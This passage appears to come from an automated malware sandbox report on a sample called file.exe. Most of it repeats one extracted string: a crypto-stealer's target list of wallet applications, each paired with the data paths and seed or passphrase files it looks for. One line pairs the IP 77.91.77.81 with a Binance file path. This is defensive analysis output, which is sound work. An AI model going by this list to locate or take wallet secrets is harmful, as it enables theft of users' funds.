Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.000000000163F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
